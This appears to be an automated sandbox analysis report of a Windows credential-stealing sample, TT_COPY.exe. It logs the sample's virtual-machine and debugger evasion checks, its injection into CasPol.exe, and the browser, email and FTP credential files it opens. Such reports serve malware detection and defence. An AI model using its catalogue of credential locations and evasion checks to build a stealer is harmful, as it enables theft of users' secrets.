            Source: Yara matchFile source: 00000000.00000002.1071156042.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_70B530C0 push eax; ret 0_2_70B530EE
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5E0E2 push edi; ret 0_2_02B5E1AB
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5E760 push esi; retf B98Ah0_2_02B5E816
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5F09C pushfd ; retf 0_2_02B5F0B6
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5F2EE push D5FAD0C3h; ret 0_2_02B5F35E
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5DEC2 push ecx; iretd 0_2_02B5DEC3
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5E19A push edi; ret 0_2_02B5E1AB
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5D539 push esi; retf BE94h0_2_02B6A149
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B5E944 push ebx; ret 0_2_02B5E949
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CA85FF push edi; retn 0000h7_2_00CA8601
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CAF988 pushfd ; ret 7_2_00CAFA3D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_00CAFA30 pushfd ; ret 7_2_00CAFA3D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20540443 push 8B000003h; iretd 7_2_2054044C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20547073 pushad ; retf 7_2_20547079
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_20546368 pushfd ; ret 7_2_20546585
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_70B51BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70B51BFF
            Source: C:\Users\user\Desktop\TT_COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\TT_COPY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: TT_COPY.exe, 00000000.00000002.1071644175.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: TT_COPY.exe, 00000000.00000002.1071644175.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3488Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B61FA0 rdtsc 0_2_02B61FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9356Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_1D510C40 sldt word ptr [eax]7_2_1D510C40
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: K32EnumDeviceDrivers,0_2_02B6EBF3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeAPI call chain: ExitProcess graph end nodegraph_0-7924
            Source: C:\Users\user\Desktop\TT_COPY.exeAPI call chain: ExitProcess graph end nodegraph_0-8077
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: TT_COPY.exe, 00000000.00000002.1071644175.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000007.00000002.5705683019.0000000001122000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5703811420.00000000010B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: TT_COPY.exe, 00000000.00000002.1071644175.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: TT_COPY.exe, 00000000.00000002.1071827304.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000007.00000002.5707246283.0000000002C79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_70B51BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70B51BFF
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B61FA0 rdtsc 0_2_02B61FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6BAFC mov eax, dword ptr fs:[00000030h]0_2_02B6BAFC
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B60CD4 mov eax, dword ptr fs:[00000030h]0_2_02B60CD4
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6D810 mov eax, dword ptr fs:[00000030h]0_2_02B6D810
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B6C27D mov eax, dword ptr fs:[00000030h]0_2_02B6C27D
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B68A50 mov eax, dword ptr fs:[00000030h]0_2_02B68A50
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_02B64F94 mov eax, dword ptr fs:[00000030h]0_2_02B64F94
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_2054DA50 LdrInitializeThunk,7_2_2054DA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\TT_COPY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D90000Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe" Jump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\TT_COPY.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\TT_COPY.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1728, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1728, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1728, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1728, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1728, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Web Service
